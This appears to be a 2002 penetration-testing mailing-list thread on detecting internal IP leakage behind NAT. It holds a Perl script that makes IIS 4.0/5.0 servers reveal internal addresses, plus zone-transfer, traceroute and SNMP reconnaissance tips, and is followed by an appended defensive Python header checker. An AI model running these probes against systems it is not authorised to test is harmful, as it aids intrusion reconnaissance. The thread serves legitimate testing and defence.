Penetration Testing mailing list archives
RE: testing for IP address space leakage in NAT systems
From: Joshua Wright <Joshua.Wright () jwu edu>
Date: Tue, 22 Jan 2002 16:32:50 -0500
IIS is famous for revealing internal IP addresses. Here is a Perl snippet I
have used to get information about the internal IP address from IIS 4.0 and
5.0 HTTPS servers using the sslcat CPAN tool:
#!/usr/bin/perl
# referrer-addr.pl
# Joshua.Wright () jwu edu
#
# Sends a bare HTTP/1.0 GET (no Host: header) over SSL and prints the
# first few lines of the response, where IIS 4.0/5.0 may embed the
# server's internal IP address.
use strict;
use warnings;
use Net::SSLeay qw(sslcat);

my $port = 443;
my $CRLF = "\x0d\x0a";

unless (@ARGV == 1) {
    print "$0 - Discover internal IP of IIS Server with malformed\n";
    print "     GET request.\n";
    print "Usage: $0 host\n";
    exit 1;
}
my ($server) = @ARGV;

# sslcat() opens the SSL connection, sends the request and, in scalar
# context, returns the raw reply.
my $reply = sslcat($server, $port, "GET / HTTP/1.0$CRLF$CRLF");
die "no reply from $server:$port\n" unless defined $reply && length $reply;

# Split on CRLF and show only the first eight lines (status + headers).
my @results = split(/\r\n/, $reply);
for my $i (0 .. 7) {
    last unless defined $results[$i];
    print "$results[$i]\n";
}
print "<snip>\n\n";
exit(0);
Umm, I am seeing silly things I did in this code already. Live and learn;
use at your own risk.
-Joshua Wright
Team Leader, Networks and Systems
Johnson & Wales University
Joshua.Wright () jwu edu
pgpkey: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xD44B4A73
fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
-----Original Message-----
From: Gamble [mailto:a629w () unb ca]
Sent: Monday, January 21, 2002 6:04 PM
To: R P G
Cc: pen-test () securityfocus com
Subject: Re: testing for IP address space leakage in NAT systems
On Mon, 21 Jan 2002, R P G wrote:
I was wondering if anyone knows of a method to test a NAT system for address space leakage. Thanks. --Bob
The easiest way to do this is to try a zone transfer (host -l abc.com). If the DNS servers are not set up correctly, you have a good shot at having a list of the internal machines. Also, sometimes if you traceroute to a machine, you will get the internal IP of the gateway, which might be of use. SNMP might also be good to you and give you a few internal IPs, but there is a very good chance that the firewall will block SNMP, but you might get lucky.

I haven't heard of any specific tools to test for leaks, and from what I have seen in the past, the best method is to query the various network servers which are known to give away network information.

-- Jamie

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
----------------------------------------------------------------------------
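An added example, not part of Joshua's or Jamie's posts: the defender's side of the IIS check above. An administrator behind NAT can feed the raw reply from a bare HTTP/1.0 GET (the request Joshua's script sends, which IIS answers with absolute URLs built from its own bound address when no Host: header is present) into this checker to see whether any response header exposes an RFC 1918 or loopback address. The sample reply is constructed; it is not captured from a real server.

```python
import ipaddress
import re
from typing import List, Tuple

# Constructed sample reply, modelled on an IIS redirect that builds its
# absolute URLs from the server's internal (NATed) address.
SAMPLE_REPLY = (
    "HTTP/1.1 302 Object Moved\r\n"
    "Server: Microsoft-IIS/5.0\r\n"
    "Date: Tue, 22 Jan 2002 21:30:00 GMT\r\n"
    "Location: http://10.1.2.3/default.htm\r\n"
    "Content-Location: http://10.1.2.3/default.htm\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# RFC 1918 ranges plus loopback: addresses that should never reach the outside.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def split_headers(reply: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from the header block of a raw HTTP reply."""
    head = reply.split("\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split("\r\n")[1:]:      # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            pairs.append((name.strip(), value.strip()))
    return pairs


def internal_addresses(reply: str) -> List[Tuple[str, str]]:
    """List (header, address) for every internal IPv4 address found in a header value."""
    leaks = []
    for name, value in split_headers(reply):
        for candidate in IPV4_RE.findall(value):
            try:
                ip = ipaddress.IPv4Address(candidate)
            except ValueError:
                continue                     # e.g. 999.1.1.1: regex hit, not an address
            if any(ip in net for net in INTERNAL_NETS):
                leaks.append((name, str(ip)))
    return leaks


if __name__ == "__main__":
    for header, ip in internal_addresses(SAMPLE_REPLY):
        print(f"internal address {ip} exposed in {header} header")
```

Run against your own server's reply, an empty result means the headers carry no internal address; any hit names the header to fix (for IIS, by making the server generate URLs from its public hostname rather than its bound address).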